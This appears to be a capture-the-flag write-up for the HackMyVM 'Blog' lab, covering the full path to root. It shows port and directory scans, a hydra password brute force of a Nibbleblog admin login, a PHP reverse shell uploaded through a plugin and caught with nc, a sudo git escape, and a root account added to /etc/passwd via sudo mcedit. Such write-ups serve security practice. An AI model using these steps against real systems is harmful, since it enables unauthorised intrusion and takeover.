HackMyVm Blog Walkthrough

HackMyVm Blog Walkthrough


Scan ports.

 nmap -sV -sC -p- -oN port.log
 Nmap scan report for furious.hmv (
 Host is up (0.0022s latency).
 Not shown: 65533 closed tcp ports (conn-refused)
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
 |   256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
 |_  256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 |_http-server-header: Apache/2.4.38 (Debian)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~/D/blog $gobuster dir -u "" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log                         08:24:24
 /index.php            (Status: 200) [Size: 271]
 /my_weblog            (Status: 301) [Size: 320] [-->]

Scan my_weblog folder.

 /content              (Status: 301) [Size: 316] [--> http://blog.hmv/my_weblog/content/]
 /themes               (Status: 301) [Size: 315] [--> http://blog.hmv/my_weblog/themes/]
 /feed.php             (Status: 200) [Size: 993]
 /admin                (Status: 301) [Size: 314] [--> http://blog.hmv/my_weblog/admin/]
 /admin.php            (Status: 200) [Size: 1395]
 /index.php            (Status: 200) [Size: 4303]
 /plugins              (Status: 301) [Size: 316] [--> http://blog.hmv/my_weblog/plugins/]
 /README               (Status: 200) [Size: 902]
 /languages            (Status: 301) [Size: 318] [--> http://blog.hmv/my_weblog/languages/]
 /LICENSE.txt          (Status: 200) [Size: 35148]
 /COPYRIGHT.txt        (Status: 200) [Size: 1271]

README shows it's  Nibbleblog.

 ~/D/blog $curl ""
 ====== Nibbleblog ======
 Version: Beta on Github
 Release date:
 Site: http://www.nibbleblog.com
 Blog: http://blog.nibbleblog.com

Add blog.hmv to /etc/hosts.

Brute force credentials of admin.

 ~/D/blog $hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  blog.hmv http-post-form  "/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect" -f -I
 [80][http-post-form] host: blog.hmv   login: admin   password: xxxxxx

Search exploit of Nibble

 ~/D/blog $searchsploit Nibbleblog                                    08:33:16
 ------------------------------------------- ---------------------------------
  Exploit Title                             |  Path
 ------------------------------------------- ---------------------------------
 Nibbleblog 3 - Multiple SQL Injections     | php/webapps/35865.txt
 Nibbleblog 4.0.3 - Arbitrary File Upload ( | php/remote/38489.rb
 ------------------------------------------- ---------------------------------

The upload module in Metasploit does no work, but we can do it by hand.

Upload reverse shell php in control  Admin Panel-->Myimage Plugin, then get rev shell.

 ~/D/blog $curl "http://blog.hmv/my_weblog/content/private/plugins/my_image/image.php"
 ~/D/blog $nc -nlvp 1234
 listening on [any] 1234 ...
 connect to [] from (UNKNOWN) [] 54256
 Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  15:30:47 up  4:34,  0 users,  load average: 0.00, 0.01, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Following step are easy. Check sudo -l of www-data, and escalate to user admin.

 www-data@blog:/var/www/html/my_weblog$ sudo -l
 User www-data may run the following commands on blog:
     (admin) NOPASSWD: /usr/bin/git
 www-data@blog:/var/www/html/my_weblog$   sudo -u admin git -p help config
 admin@blog:/var/www/html/my_weblog$ id
 uid=1000(admin) gid=1000(admin) groups=1000(admin)

Then we can upload id_rsa.pub and get ssh login, if you want.

Check sudo -l of admin.

 admin@blog:~$ sudo -l
 sudo: unable to resolve host blog: Temporary failure in name resolution
 Matching Defaults entries for admin on blog:
     env_reset, mail_badpass,
 User admin may run the following commands on blog:
     (root) NOPASSWD: /usr/bin/mcedit

Use mcedit to edit /etc/passwd, add new root user and password:root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash  , and we can get root.

 admin@blog:~$ su root2
 root@blog:/home/admin# id;hostname
 uid=0(root) gid=0(root) groups=0(root)



«    2022年12月    »
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2